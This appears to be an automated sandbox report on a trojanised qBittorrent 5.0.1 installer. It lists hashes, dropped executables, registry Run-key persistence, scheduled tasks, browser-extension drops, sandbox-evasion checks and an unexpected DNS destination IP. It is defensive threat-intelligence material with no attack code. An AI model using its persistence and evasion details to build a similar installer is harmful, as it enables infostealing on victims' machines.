Overview
overview
8Static
static
3qbittorren...up.exe
windows11-21h2-x64
8$PLUGINSDI...LL.dll
windows11-21h2-x64
3$PLUGINSDI...LL.dll
windows11-21h2-x64
3$PLUGINSDI...em.dll
windows11-21h2-x64
3$PLUGINSDIR/UAC.dll
windows11-21h2-x64
3$PLUGINSDI...gs.dll
windows11-21h2-x64
3$PLUGINSDI...lW.dll
windows11-21h2-x64
3qbittorrent.exe
windows11-21h2-x64
1uninst.exe
windows11-21h2-x64
7$PLUGINSDI...LL.dll
windows11-21h2-x64
3$PLUGINSDI...LL.dll
windows11-21h2-x64
3$PLUGINSDI...em.dll
windows11-21h2-x64
3$PLUGINSDIR/UAC.dll
windows11-21h2-x64
3$PLUGINSDI...lW.dll
windows11-21h2-x64
3Analysis
-
max time kernel
1050s -
max time network
1052s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-11-2024 04:55
Static task
static1
Behavioral task
behavioral1
Sample
qbittorrent_5.0.1_x64_setup.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
$PLUGINSDIR/FindProcDLL.dll
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/LangDLL.dll
Resource
win11-20241007-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win11-20241007-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/UAC.dll
Resource
win11-20241007-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win11-20241007-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsisFirewallW.dll
Resource
win11-20241007-en
Behavioral task
behavioral8
Sample
qbittorrent.exe
Resource
win11-20241007-en
Behavioral task
behavioral9
Sample
uninst.exe
Resource
win11-20241007-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/FindProcDLL.dll
Resource
win11-20241007-en
Behavioral task
behavioral11
Sample
$PLUGINSDIR/LangDLL.dll
Resource
win11-20241007-en
Behavioral task
behavioral12
Sample
$PLUGINSDIR/System.dll
Resource
win11-20241007-en
Behavioral task
behavioral13
Sample
$PLUGINSDIR/UAC.dll
Resource
win11-20241007-en
Behavioral task
behavioral14
Sample
$PLUGINSDIR/nsisFirewallW.dll
Resource
win11-20241007-en
General
-
Target
qbittorrent_5.0.1_x64_setup.exe
-
Size
37.4MB
-
MD5
fd6ea4e1d7b3adb820908ec26b729ea7
-
SHA1
485b31d0f8394efdaa860c0d4a54227033f40579
-
SHA256
5513812584a5ba7810b812db7ceec2d0e9cb214cef95a2580e29927cf4fe9921
-
SHA512
e587c67bd4da787226187918206acfdb9ef4192e884b41e0680cf96458799eeeabde97376dbdfdd89c7de12839a062bd8f8da50b9e6a49c33018461783535c66
-
SSDEEP
786432:7fFBmZOcw9i54tPYrFrQAEODhrbt+Fn1/Zo2NCILF5Iud3gIwmbN:79BH1e+sFspIteZtQILFDdQIwm5
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 274 3688 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 5244 powershell.exe 4584 powershell.exe 5808 powershell.EXE 1172 powershell.exe 4216 powershell.exe 1768 powershell.exe 1628 powershell.exe 4656 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cihvqPa9fiUGQzUJzD3H.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\International\Geo\Nation fyArOsB.exe -
Executes dropped EXE 64 IoCs
pid Process 3816 qbittorrent.exe 2336 is-N2EH9.tmp 1460 bommixpro.exe 3120 GtBtte.exe 1368 Izaw0OcctowNceUeU.exe 396 Izaw0OcctowNceUeU.tmp 856 shineencoder.exe 3252 6OOwtsS.exe 4588 setup.exe 1864 setup.exe 2564 setup.exe 4572 setup.exe 3260 setup.exe 3396 0VWXDTifa42.exe 2860 0VWXDTifa42.tmp 4736 utorrent9.exe 4948 cihvqPa9fiUGQzUJzD3H.exe 1172 utorrent9.tmp 3080 qbittorrent.exe 2956 Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe 4032 assistant_installer.exe 3292 assistant_installer.exe 4876 setup.exe 424 Snetchball.exe 4372 Snetchball.exe 2752 Snetchball.exe 1560 Snetchball.exe 4488 Snetchball.exe 2848 Snetchball.exe 5472 Snetchball.exe 5824 cihvqPa9fiUGQzUJzD3H.exe 4860 Snetchball.exe 6116 Snetchball.exe 6056 Snetchball.exe 1892 Snetchball.exe 3484 Snetchball.exe 408 Snetchball.exe 4732 Snetchball.exe 4544 Snetchball.exe 5528 Snetchball.exe 444 Snetchball.exe 5692 Snetchball.exe 5308 fyArOsB.exe 712 qbittorrent.exe 5548 Snetchball.exe 3828 Snetchball.exe 924 Snetchball.exe 2940 Snetchball.exe 5196 Snetchball.exe 4844 Snetchball.exe 4220 Snetchball.exe 3424 Snetchball.exe 2728 Snetchball.exe 2244 Snetchball.exe 5816 Snetchball.exe 5424 Snetchball.exe 5348 Snetchball.exe 5160 Snetchball.exe 1628 Snetchball.exe 5848 Snetchball.exe 764 Snetchball.exe 4888 Snetchball.exe 2328 Snetchball.exe 2708 Snetchball.exe -
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 768 forfiles.exe 2848 forfiles.exe -
Loads dropped DLL 64 IoCs
pid Process 3900 qbittorrent_5.0.1_x64_setup.exe 3900 qbittorrent_5.0.1_x64_setup.exe 3900 qbittorrent_5.0.1_x64_setup.exe 3900 qbittorrent_5.0.1_x64_setup.exe 3900 qbittorrent_5.0.1_x64_setup.exe 3900 qbittorrent_5.0.1_x64_setup.exe 3900 qbittorrent_5.0.1_x64_setup.exe 2336 is-N2EH9.tmp 1460 bommixpro.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 396 Izaw0OcctowNceUeU.tmp 856 shineencoder.exe 4588 setup.exe 1864 setup.exe 2564 setup.exe 4572 setup.exe 3260 setup.exe 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 4876 setup.exe 424 Snetchball.exe 424 Snetchball.exe 424 Snetchball.exe 424 Snetchball.exe 424 Snetchball.exe 424 Snetchball.exe 424 Snetchball.exe 424 Snetchball.exe 4372 Snetchball.exe 4372 Snetchball.exe 1560 Snetchball.exe 1560 Snetchball.exe 2752 Snetchball.exe 2752 Snetchball.exe 4488 Snetchball.exe 4488 Snetchball.exe 4372 Snetchball.exe 4372 Snetchball.exe 1560 Snetchball.exe 1560 Snetchball.exe 2752 Snetchball.exe 2752 Snetchball.exe 4488 Snetchball.exe 4488 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 4372 Snetchball.exe 4372 Snetchball.exe 1560 Snetchball.exe 1560 Snetchball.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 91.211.247.248 -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json fyArOsB.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json fyArOsB.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini fyArOsB.exe -
Enumerates connected drives 3 TTPs 5 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\F: setup.tmp File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 fyArOsB.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol cihvqPa9fiUGQzUJzD3H.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini cihvqPa9fiUGQzUJzD3H.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B5CFE5FD779BB3279A8A1976B86E6FEF fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache fyArOsB.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 fyArOsB.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 fyArOsB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B5CFE5FD779BB3279A8A1976B86E6FEF fyArOsB.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft fyArOsB.exe -
Drops file in Program Files directory 53 IoCs
description ioc Process File created C:\Program Files\qBittorrent\translations\qtbase_fr.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_pt_BR.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_tr.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\qbittorrent.exe qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_gd.qm qbittorrent_5.0.1_x64_setup.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fyArOsB.exe File created C:\Program Files\qBittorrent\translations\qtbase_cs.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files (x86)\kmKpunNFSNUn\miGLjZP.dll fyArOsB.exe File created C:\Program Files\qBittorrent\translations\qtbase_nl.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_sk.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files (x86)\OMeOFycTU\sDlzcs.dll fyArOsB.exe File created C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\VbwHiFR.dll fyArOsB.exe File created C:\Program Files\qBittorrent\translations\qt_lt.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files (x86)\NOWTtjuGDiydC\tRAjDwC.xml fyArOsB.exe File created C:\Program Files\qBittorrent\translations\qt_gl.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_lv.qm qbittorrent_5.0.1_x64_setup.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi fyArOsB.exe File created C:\Program Files\qBittorrent\translations\qtbase_he.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_hr.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fyArOsB.exe File created C:\Program Files (x86)\OMeOFycTU\IbVSERq.xml fyArOsB.exe File created C:\Program Files (x86)\RnBNRnIwUzVU2\MhVtTAB.xml fyArOsB.exe File created C:\Program Files (x86)\NOWTtjuGDiydC\NVyKOwG.dll fyArOsB.exe File created C:\Program Files\qBittorrent\translations\qt_sv.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_es.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_fi.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_nn.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qt_sl.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_ru.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_zh_TW.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qt_pt_PT.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_de.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_uk.qm qbittorrent_5.0.1_x64_setup.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja fyArOsB.exe File created C:\Program Files\qBittorrent\translations\qtbase_bg.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_ka.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\uninst.exe qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_fa.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_pl.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_zh_CN.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_ar.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_ko.qm qbittorrent_5.0.1_x64_setup.exe File opened for modification C:\Program Files\qBittorrent\qbittorrent.exe qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_da.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_hu.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_ja.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi fyArOsB.exe File created C:\Program Files (x86)\RnBNRnIwUzVU2\fskDJltzbcOsh.dll fyArOsB.exe File created C:\Program Files\qBittorrent\qt.conf qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\qbittorrent.pdb qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_ca.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files\qBittorrent\translations\qtbase_it.qm qbittorrent_5.0.1_x64_setup.exe File created C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\ZPZMxro.xml fyArOsB.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File created C:\Windows\Tasks\kWTyeDFhQZoEtpUUx.job schtasks.exe File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4220_1781550272\_platform_specific\win_x86\widevinecdm.dll.sig Snetchball.exe File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4220_1781550272\_platform_specific\win_x86\widevinecdm.dll Snetchball.exe File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4220_1781550272\_metadata\verified_contents.json Snetchball.exe File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4220_1781550272\manifest.fingerprint Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File created C:\Windows\Tasks\bhzAbyJhiYArNEwhRY.job schtasks.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File created C:\Windows\Tasks\VGggbamSlsorNxx.job schtasks.exe File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4220_1781550272\LICENSE Snetchball.exe File created C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4220_1781550272\manifest.json Snetchball.exe File opened for modification C:\Windows\SystemTemp Snetchball.exe File created C:\Windows\Tasks\coQLnzjOCQIuUMNyn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 2628 1460 WerFault.exe 115 2080 1460 WerFault.exe 115 3860 1460 WerFault.exe 115 2560 1460 WerFault.exe 115 1040 1460 WerFault.exe 115 4372 1460 WerFault.exe 115 2808 1460 WerFault.exe 115 1172 1460 WerFault.exe 115 1232 1460 WerFault.exe 115 2672 1460 WerFault.exe 115 4616 1460 WerFault.exe 115 2148 1460 WerFault.exe 115 888 1460 WerFault.exe 115 4776 1460 WerFault.exe 115 2076 1460 WerFault.exe 115 3416 1460 WerFault.exe 115 3612 1460 WerFault.exe 115 4896 1460 WerFault.exe 115 2752 1460 WerFault.exe 115 2676 1460 WerFault.exe 115 4176 1460 WerFault.exe 115 4680 1460 WerFault.exe 115 768 1460 WerFault.exe 115 3564 1460 WerFault.exe 115 2640 1460 WerFault.exe 115 4784 1460 WerFault.exe 115 2656 1460 WerFault.exe 115 2152 1460 WerFault.exe 115 3940 1460 WerFault.exe 115 2072 1460 WerFault.exe 115 1404 1460 WerFault.exe 115 2412 1460 WerFault.exe 115 908 1460 WerFault.exe 115 4644 1460 WerFault.exe 115 3324 1460 WerFault.exe 115 1376 1460 WerFault.exe 115 928 1460 WerFault.exe 115 3320 1460 WerFault.exe 115 1500 1460 WerFault.exe 115 4876 1460 WerFault.exe 115 2704 1460 WerFault.exe 115 2352 1460 WerFault.exe 115 1000 1460 WerFault.exe 115 3128 1460 WerFault.exe 115 4184 1460 WerFault.exe 115 1596 1460 WerFault.exe 115 400 1460 WerFault.exe 115 4644 1460 WerFault.exe 115 1800 1460 WerFault.exe 115 3060 1460 WerFault.exe 115 1444 1460 WerFault.exe 115 5248 5824 WerFault.exe 274 3312 1460 WerFault.exe 115 196 4948 WerFault.exe 245 5284 5308 WerFault.exe 366 4192 1460 WerFault.exe 115 4876 1460 WerFault.exe 115 3128 1460 WerFault.exe 115 6000 1460 WerFault.exe 115 5188 1460 WerFault.exe 115 5928 1460 WerFault.exe 115 5540 1460 WerFault.exe 115 436 1460 WerFault.exe 115 4632 1460 WerFault.exe 115 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shineencoder.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language utorrent9.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0VWXDTifa42.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cihvqPa9fiUGQzUJzD3H.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6OOwtsS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0VWXDTifa42.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Snetchball.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3688 rundll32.exe 2420 rundll32.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x008c00000002aa96-728.dat nsis_installer_1 behavioral1/files/0x008c00000002aa96-728.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
